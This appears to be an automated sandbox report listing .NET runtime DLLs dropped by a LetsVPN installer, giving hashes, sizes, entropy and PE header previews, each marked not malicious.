SHA-512:	7442210B136734C77809BD4C1FEA00A2C0FE47803AB797C4C6C146BAEDECF6267A1FC6140BE7A8E97274D5378BCCB490FB39C6E026DD3FA44FBB81E6DF690798
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ....................................@.................................p)..O....@..@................+...`......8(............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................)......H.......P ..h....................'......................................BSJB............v4.0.30319......l.......#~..d.......#Strings....@.......#US.D.......#GUID...T.......#Blob......................3..................................................C...f.C...:.0...c.....N.................M.................e...........7..... ................................)....1....9....A....I....Q....Y....a....i....q.*.......................#.....+.....3.....;.....C.9...K.Y...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.FileSystem.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.916341452717303
Encrypted:	false
SSDEEP:	384:SBLRWbYW+EpwKANynsAw/98E9VF3AM+oYH+eldn:SB26Aw/KENAMxYdn
MD5:	5C690CE5296DF97EC7DDA8C31813D4C6
SHA1:	0B6AED473753A8102CFFFAE521C2868784104A8D
SHA-256:	B3A4497DE0831383956484815185AE3A3500A04024988D3C369036CC685C1992
SHA-512:	FC17E215B9315D76DCB809EA6F84643001DE2488ABE1FA2B6E70C6CE8C0BF575E58ADF0334FC10968529924C8FE46D4BB3D2450E5A674958AECC8207BA0E53A9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0.............b)... ...@....... ..............................@.....@..................................)..O....@...................+...`.......'............................................... ............... ..H............text...h.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................D)......H.......P ......................X'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings............#US.........#GUID...........#Blob......................3................................................../...z./...N.....O.....b.................a...........0.....y...........K.....4...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.IsolatedStorage.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.907423713499948
Encrypted:	false
SSDEEP:	384:aHW4/WU4EpwKANynsAw/98E9VF3AM+om7CAyyhlnRy:ari5Aw/KENAMxKCXyhlnRy
MD5:	6619081571A33A10323FFCB6F62F97AF
SHA1:	446B905A6231EE7068C5A469407D024BD72C4E18
SHA-256:	335EB2A8D88AAC31BC001FBB494C20E6A1EF64B8A3AE6977E6FFDCC98FB7A172
SHA-512:	FE7500D63F5F4DDB6E1E14751F526833D03019C0E7357741B926A20D6E880B94A989B83DFC074DA3BCF91B67D693546773D67F92E62B9541901E0C719186AD6A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@.. ................+...`......X'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......\...#Strings....`.......#US.d.......#GUID...t.......#Blob......................3..................................................+.....+...^.....K.....r.................q.....'.....@.................[.....D...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.MemoryMappedFiles.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.960962234154388
Encrypted:	false
SSDEEP:	384:5vk7hWmCWT6pwKANynsAw/98E9VF3AM+oPy877:5s7/nAw/KENAMxx
MD5:	F1E0BCB969F660A0694A631700C1C74C
SHA1:	6DDF8D3FF19D3EDFFB69B45B2EF4FEFACBAE7785
SHA-256:	0D5C7570AB3351291F3E89FD7FF2FF920B8A0BF5056D9EBC347771A012BABA75
SHA-512:	DBDC45285556BFD0F886C8A796E759600B65922544317FA273B07DDF29CAA3DCBA4BB511973ED6AA524AC56F302905500F52329D98289B1301B375CB89CEA26F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ....................................@.................................h)..O....@..0................+...`......0(............................................... ............... ..H............text........ ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................)......H.......P ..`....................'......................................BSJB............v4.0.30319......l.......#~..H.......#Strings....8.......#US.<.......#GUID...L.......#Blob......................3................................................ .C.....C...w.0...c.............................@.....Y.................t.....]................................)....1....9....A....I....Q....Y....a....i....q.*.......................#.....+.....3.....;.....C.8...K.X...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.Packaging.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	48104
Entropy (8bit):	5.956440090685503
Encrypted:	false
SSDEEP:	768:Dxua7db+smzMnSzBt++0YfTF61O+luv5tyIAw/KENAMxtRl4:DxH7ssKugt+++1luv5tyIAwrxtQ
MD5:	7DE684000FD09F0A319782CDE7FB4098
SHA1:	5F6DE103DF572A76DB475146E1DEE12610060949
SHA-256:	B2A59B165E0BA461530C69747A0220B977382A3FBB5D4EC1892EB501FE236CC7
SHA-512:	C1BBCF5772DD25B29D114B0181B907349ACEDCDE82C30D76C75B4257E46E231528D3C0B59F0B1FE0E6973ADBBD5DDDCFC710535C7A28FE911F0FD7AC37D1B784
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)1............" ..0.................. ........... ....................................`.................................S...O........................+..........t...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......`(...D...........l...6...........................................~......0..........(....,....(.....o.......&......................0...........(.......(....-..,....(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(......,&(....,..r...pr...p.(....(......(......(....,.r...p......%...%...(.......(.....(....,.r...p......%...%...%...(........(.....(....,"r...p......%...%...%...%..

C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.Pipes.AccessControl.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	20968
Entropy (8bit):	6.63165380644001
Encrypted:	false
SSDEEP:	384:DANJdesEvbDYUgmpWrxWNPfWqxWfPmnpwKANynsAw/98E9VF3AM+oAtOkaEvM:SclTD/yod2bAw/KENAMxE70
MD5:	DBFD249ED5D76598C98126B6D50EF479
SHA1:	E19E8BC586375BDF910B45C45BAD82AF60EF3B25
SHA-256:	04EE5D37A90404401FF94A4C1904ECD8D6D684C5A49B763421A8A3E5E68E3860
SHA-512:	89B4B2592C09C17E663F43ED6BD5879F61B69D598AEA0704AB1E28198F3F06C18238D05E07AF92E9518EB22EC56F9CA01A334F8D5A7CF4A5C71203EB45BCBCDE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.[.........." ..0.............Z5... ...@....... ..............................G.....@..................................5..O....@..P............&...+...`......T4............................................... ............... ..H............text...`.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`.......$..............@..B................;5......H........!...............0..(....3......................................j~....%-.&(....s....%..........0..$.........(.....o.......&...,....o....,.....................,!(....,..r...p.(....(......(......(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(.....~....2r...p.(....2ra..p.(....2r...p.(....2r...p.(....2r...p.(....B.....(...........o...."..o.....BSJB............v4.0.30319..

C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.Pipes.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.927838293875772
Encrypted:	false
SSDEEP:	384:dGMWCUWbopwKANynsAw/98E9VF3AM+o3303r0ND:d3HAw/KENAMxU3CD
MD5:	A2311347E254C061BF6C1F24A4A1DFA8
SHA1:	18483DB09090C9E3C7B50313C66B2340DDAF7CAC
SHA-256:	62FD18D7BB1FB2EE4F25FA443D826C009760FC7D814718223F3513F26DA51216
SHA-512:	3B2AA09F78C8F90602D4C299D46FDFFFCA58E3D10AF7081B28A2C01802C73496786B0AC35766FA2DF6D23C79C456203E9C2DB35A33AE9D3ED7CE16864287EC9C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ..............................nB....@.................................@)..O....@...................+...`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................t)......H.......P ..8....................'......................................BSJB............v4.0.30319......l.......#~..X.......#Strings............#US. .......#GUID...0.......#Blob......................3..................................................].....]...T.J...}.....h.$.....$.....$...g.$.....$...6.$.....$.....$...Q.....:.$.................D.....D.....D...).D...1.D...9.D...A.D...I.D...Q.D...Y.D...a.D...i.D...q.D.......................#.....+.....3.....;.....C.,...K.L...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.Ports.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	35304
Entropy (8bit):	6.273566191911974
Encrypted:	false
SSDEEP:	768:y44bN5hwABzKGUn11fF+1WWAw/KENAMxJo:y5bLhLBzcn1gWWAwrxe
MD5:	D9527FAA55F0D7A737845D14F0FA6FFF
SHA1:	A871AC8A95DF15D069E20DA521A215E91B0FA476
SHA-256:	F47E5FC825463E6EB7F3947A564982DE3EDE85EF9882294530B1F03CE7C3115D
SHA-512:	BD1D34565BB002998E9A68649BCD96AEE24138944D8B1BA702639CF412044B0F08965B62DF08C68B0EF2FC6D16201B293EB420DA60A95B7EF5102E56EC1A8A43
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..T...........s... ........... ..............................>L....`..................................r..O....................^...+...........q..T............................................ ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............\..............@..B.................r......H........&...............U..X...`q.......................................~......0..........(....,....(.....o.......&......................0...........(.......(....-..,....(....,.r...p......%...%...(......(.....(....,.r...p......%...%...%...(.......(.....(....,!r...p......%...%...%...%...(........(......,&(....,..r...pr...p.(....(......(......(....,.r...p......%...%...(.......(.....(....,.r...p......%...%...%...(........(.....(....,"r...p......%...%...%...%..

C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.UnmanagedMemoryStream.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.912941177738582
Encrypted:	false
SSDEEP:	384:c9BhwI7WSQWBPpwKANynsAw/98E9VF3AM+o2Yp9d:c9DwIB6Aw/KENAMxhD
MD5:	8B51C8E0F7295DD4F4CAD987DF43DCCE
SHA1:	83D9317DF8B46AA52C5AE6605B0AC451DC8C62E3
SHA-256:	0A6FA415695878ED0D59B8A09EA4C247FF12762056B637E7EA623AB0CD80F3E9
SHA-512:	1AA7FE3015AEE0C92C0869D409CD4965F0B5326195728E16671DC87E1AE4639ABBCC6CBA5D609995EA5D90FBEF17406D2843B14571FB7D19BF935C8715EEB4AF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...............................w....@.................................l(..O....@..P................+...`......4'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P ..d....................&......................................BSJB............v4.0.30319......l.......#~......D...#Strings....8.......#US.<.......#GUID...L.......#Blob......................3......................................................f.....:.....2.....N.................M.................e...........7..... ...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.925029499359628
Encrypted:	false
SSDEEP:	384:jyvPRW4lWSlpwKANynsAw/98E9VF3AM+oayAYX:+39mAw/KENAMxp
MD5:	CF7BD5371870C68B3F0B3D28706445AD
SHA1:	8A9BBC216417D64C7C2BD2F999716272AEA48775
SHA-256:	97F68D3B3E4D60C8A66C6E05484D684572D7120EBF160FE644C7EBF0AD0149B1
SHA-512:	BBAF7E0E430889634A1CC5C0BE5B0B329EE4B5F6BE5452AE8948312D5AD83C6A40FF018768F99ACF1B270AD8BCAD562AE396F5ECE6C671D686318AC789979758
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..Y.........." ..0..............)... ...@....... ..............................>.....@..................................)..O....@...................+...`......l(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...L...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................f.....:...........N.................M.................e...........7..... ...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.&...K.F...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Linq.Expressions.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	17384
Entropy (8bit):	6.877846883270474
Encrypted:	false
SSDEEP:	384:H6RW6eWqkpwKANynsAw/98E9VF3AM+od0q9SR:H67cAw/KENAMxez
MD5:	3E2F799AB970A41C2C8E5E7534845C24
SHA1:	1FE64C66F7A83551436BF4B3EFFF8945205E85FE
SHA-256:	427F56E9C708F3E46A24A362C75C94048ECF421941D450005DDCAACA956BF449
SHA-512:	DE901852EC48E27D29CBD035D38005854A55EE7F847C27E8453A74B534B1AB4FB097E929F65C205C7440D457F329EBD9CC06CFE4CA21A1023360D8D435C88A6A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............-... ...@....... ...............................F....@..................................-..O....@...................+...`......P,............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P .......................+......................................BSJB............v4.0.30319......l.......#~..\.......#Strings....\.......#US.`.......#GUID...p.......#Blob......................3......................................5.........c.............z...............(.....E.....................................Q.........../...........b.....b.....b...).b...1.b...9.b...A.b...I.b...Q.b...Y.b...a.b...i.b...q.b.......................#.....+.....3.....;.....C.4...K.T...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Linq.Parallel.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.908980993884322
Encrypted:	false
SSDEEP:	384:JSUP9W70WY1pwKANynsAw/98E9VF3AM+ox/E1:QUe1Aw/KENAMxxg
MD5:	F2174ACB80D143534E86251227B61754
SHA1:	904DA138FAED4E5E58C1F81DAD95B8A64DD9D66E
SHA-256:	359C5BDDACD7DBE19E7E98067519B4A4EACD68515DEF059C5B4EBFE07857DBDF
SHA-512:	8FD48CDB9EAF955D8C5F6F76CEF26F6E30231F8214341DD82053B7CFEB8821C9F2B6F8E8421A40196DC0532DBC9DAB1AC581F4E63FA08718ACA38153724A84CD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ...............................M....@..................................(..O....@...................+...`.......'............................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..,...x...#Strings............#US.........#GUID...........#Blob......................3..................................................&.....&...p.....F.............................9.....R.................m.....V...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Linq.Queryable.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.906006192564813
Encrypted:	false
SSDEEP:	384:K8yg07W0/W82pwKANynsAw/98E9VF3AM+ob/Ggha:KBHZAw/KENAMx7Hs
MD5:	B7F1F348FB749AFEA248B49C06157E47
SHA1:	3EFD58FC81DFC96A330B671627B03DA05D9B03B7
SHA-256:	187D6A46549050C706E5DCA0E80632C54CAB234CF18C53EC746558D1AD866CB4
SHA-512:	5CB4058ACEC2A08FC269464C486FFBA9CEEBCC16EBA8D3448F4CB255C71CA6EC2751468128CB74F74FC89DD12E552A30C38729C995C82AA3DE842DB846B38D22
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............)... ...@....... ...............................`....@..................................(..O....@...................+...`......x'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~.. ...d...#Strings............#US.........#GUID...........#Blob......................3.................................................."....."...m.....B.............................6.....O.................j.....S.......(...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.2...K.R...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Linq.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.871260511266613
Encrypted:	false
SSDEEP:	384:je1WmRWlbpwKANynsAw/98E9VF3AM+oTyp9QU:jejfAw/KENAMx+pV
MD5:	27F0BCCBF696F5F8346CEA6F86794100
SHA1:	FBA05E15CAA7C24921DAC2886619B7810C052B13
SHA-256:	55223D201D441AA3385A1F5C74FB6A262E3E295BA8E934DEF97BB98AB47BD887
SHA-512:	566DE66663F59478495A80427AFFDBEA39B8E566B9245D9B196A3D1EAA5BB493BEAB3F8BA89A4B16A736E7572975905154D831520700E8B98E32FDF628AF8EB6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ...............................T....@.................................p(..O....@...................+...`......8'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..h....................&......................................BSJB............v4.0.30319......l.......#~.. ...0...#Strings....P.......#US.T.......#GUID...d.......#Blob......................3............................................................f...........z.................y...../.....H.................c.....L.......,...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.(...K.H...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Management.Automation.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	365544
Entropy (8bit):	5.907896588749653
Encrypted:	false
SSDEEP:	6144:eA0HY8o04jatc9MCELK5h+BO2L1fsqF030MhU:eA0HYnitRCOFOI1WfU
MD5:	AF5AAAEF554DD9A976568304EAFAC781
SHA1:	75CE538111D00E957DC608C1B7B9AD063AA55CBB
SHA-256:	52EFAACC812848164955787C7ED20FC330CF89C65CBA39B0E008E65ED852D25F
SHA-512:	4827497E0F1ECD2C20BC4AB268EC427A6D5301AA12F6A83EA54E7F3AF197C98F381A62B524DD086DB80FA032C1133C3FC50D0941B96C43C6A5C8CF764AF747D6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;..........." ..0..`...........~... ........... ..............................<1....`.................................?~..O....................h...+..........\}..T............................................ ............... ..H............text....^... ...`.................. ..`.rsrc................b..............@..@.reloc...............f..............@..B................s~......H.......t\|..h....................\|........................................('.....((.....(#............(......(......(......(.........(1.......(....................(......(......(......(......(......(......(......(.....................().....()...........(........(......(......(......(......('.......Q...(.....................('.....((..............('.....('.......................('.........

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Memory.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	143336
Entropy (8bit):	6.177665404019452
Encrypted:	false
SSDEEP:	3072:WUGrszKKLB8a9DvrJeeesIf3amN32AW/rcjhFdj:hB8l3/aK32eh7j
MD5:	981CAEC25ECADC701AB4447AFFAEF1DE
SHA1:	620E2FB15BB20D769D8855B3881FDD18A2BA0403
SHA-256:	21B9D6C1317A1977E7C0D1CC06446BA422C7EAC66643518D99466616F7806AA9
SHA-512:	B0A95935C2D9571CEA5FDF4831E4D67D39CEEFC762DB1F23106FA995332B54C12A1BDF97248118A83F485248EAAA1980CB6560A8C967432318671C79193CC0F0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6wb.........." ..0.................. ... ....... .......................`......6.....@.................................`...O.... ..@................+...@......(................................................ ............... ..H............text........ ...................... ..`.rsrc...@.... ......................@..@.reloc.......@......................@..B........................H........,................................................................('...>..}......}......{......{......{.....{....3..{.....{....((......0...........%.u....,..........(.....z.{....%-.&.+.o)....{....(a.....(....zN........o...s+....(....z.s,.....(....zF(U....(O...s-....(....z.(V...s-....(....z.s.....(....z.s/.....(....zN........o...s0....(....zrr...p(\....c.K...(O...s1....(....zBr...p(Y...s1....(....z.s2....(....z.(X...s3....(!...z.(_...s3...*.(#...z

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.Http.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	193512
Entropy (8bit):	6.125628048669688
Encrypted:	false
SSDEEP:	3072:seruQlNGOhYq0AQcTvankc+8lbKta4FUPAT8xpRI454I/Kv6RpZ8dwPSgxhL:FW60VcTvakcXcApOghL
MD5:	6D89FD823B94BE6C2E534FF57ABA3DB9
SHA1:	944518F037278434B44ADEE7ECC7BCFC02A3671D
SHA-256:	0C7A84C6226A8D99C7F2507025FEDE186780633A3943013E0BE7607167C97BAC
SHA-512:	EB77A0A02835DCBF992EFE485767325BE5A504D5ED7468A6736AE9A37AC62D2FD122C03442B2D4DB11BE285598B6653133CA2D87D5DF74AE7B4A920427AC297D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0.................. ........... ....................... .......{....@.....................................O.......h................+........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...h...........................@..@.reloc..............................@..B........................H........$..H...........$....,...........................................0..,........ ....1.r...ps0...z.............(.....s1....0..l........J.2..J.o2...2.r...ps0...z..Jo3....%36.o2....JY.2..J.Xo3.....J.Xo3...(...... ........J.XT....J...XT.o3.....o2....Y./....o3....%3 ...Xo3......Xo3...(.... ..........0..=..........J...XT..%....J...XT.~..... ...._.c.....J...XT.~......._......0............02...91...A2...F1...a2...f1. ....*..91...F1...aY+...AY..X+...0Y...02...91...A2...F

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.IPNetwork.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	37864
Entropy (8bit):	6.424371908906091
Encrypted:	false
SSDEEP:	384:OVRG18S8ZaRMtn/RF6XbPnP8hbUePwV/QjTGIHeesAc1pwKANynsAw/98E9VF3A3:OVc1GUMB/z6XmY/iee5/Aw/KENAMx8R
MD5:	F40C07C648C8C38147C59A9C61239361
SHA1:	8AD1B7F295E4E00CEFC6F05EC2F3C1E0B8A62172
SHA-256:	201DC7B20D6CBA7EB4DC2048956B280C1A09E7A48CAE5CB99FD5C95222FFFB8D
SHA-512:	52001DD577222B85BB40794787805B6EB5CBF12EECB64BD5A2C7DEDB18650698ACA75EAB741E51068179C4E3A4629D4569042B3D068295B2EF60DBE9A3808ACB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..\..........r{... ........... ..............................(.....`..................................{..O.......h............h...+..........0z..T............................................ ............... ..H............text....[... ...\.................. ..`.rsrc...h............^..............@..@.reloc...............f..............@..B................Q{......H.......D>..l;...................y.......................................0..v.........(.......i.Y...i.Zs.........(.......o.....0....(.....3...0o....&..o ...&..Y.+......(......0o!...o ...&..Y.../..o"...6..r...p(#....0............(.......i.Y...i.[.X.Zs.......i.]..-......+....b......%.Y..X....Y..-....($........o.....0....(.....3...0o....&...o ...&+1.....b...Y..bX...Y.X......($.....0o!...o ...&..Y.../..o"...*...0..d.........(.......X...i.3..+.../......+......f...X....i.Y2...i.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.NameResolution.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.891711536643205
Encrypted:	false
SSDEEP:	384:L6ZWYLWIdpwKANynsAw/98E9VF3AM+o/MhJw4:L6lyAw/KENAMxUfw4
MD5:	5CF8352288A3E2C194B8916DE5E1CF8D
SHA1:	22ABC0FDE9C48B1529D920E03966AB14FFDD9F3C
SHA-256:	0120BAB0F8FA20274F13F8BF0D2177B0D7F247F1090AB94CC3DF50540CF5EEED
SHA-512:	5668AB6455594F2253ED995C71405CADA14365D46BC70A0D125267BC0855D7555048FC9598DAAB3C4054708838A2B2E111FD22B697C7E654A13F02E4F109AB86
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............(... ...@....... ....................................@.................................T(..O....@.. ................+...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l.......#~......0...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.NetworkInformation.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	17384
Entropy (8bit):	6.8495734817007135
Encrypted:	false
SSDEEP:	384:nZ1W1WMQWhRpwKANynsAw/98E9VF3AM+oZbgr:21MAw/KENAMxw
MD5:	4F27F06AAC9439B3673212E0E372C195
SHA1:	0546CD67233E8F65DFD080FFC4EC8482068F6F62
SHA-256:	7FA0F04C2F17575754CC48EAC4131874F8A1F2CAC761DDB51FD691938CB3EEF1
SHA-512:	32513A64091B2391B4A5FCDEE2535D9933EDBC1DD048CD9CA4007880EE61C049A0522D4695FB38FEE657DCB8D4DDB70ED4A8B3219B374CDB278A0AAB0BC0EB73
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..............,... ...@....... ..............................J.....@..................................,..O....@..@................+...`......p+............................................... ............... ..H............text........ ...................... ..`.rsrc...@....@......................@..@.reloc.......`......................@..B.................,......H.......P .......................*......................................BSJB............v4.0.30319......l...<...#~..........#Strings....t.......#US.x.......#GUID...........#Blob......................3................................!...............E.................%.................'...........e.....~...........................................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.:...K.Z...S.

C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.Ping.dll

Download File

Process:	C:\ProgramData\letsvpn-latest.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	16360
Entropy (8bit):	6.883311037346329
Encrypted:	false
SSDEEP:	384:KdSWSKWUxpwKANynsAw/98E9VF3AM+otIRE6D6S:MOfAw/KENAMxtWP5
MD5:	53F96C63BE9243B0B5E0B4DBCA8F4A39
SHA1:	4FEC6835E51FE0480FD9A91EBF88093D4A17E142
SHA-256:	968C6736BE25FD635DEDC7A7DE410ABE17BEF44F7B3FE07E7A38BE8C35175989
SHA-512:	C71252457CC52B76F6958C366E05FE06AF17DEBE8CAEA7E890B5F4339CF546F8A63FF2EA100AEFCA23B8A9E4289E62FDCF36D96BA722DF75A1D94ADB53CF139E
Malicious:	false
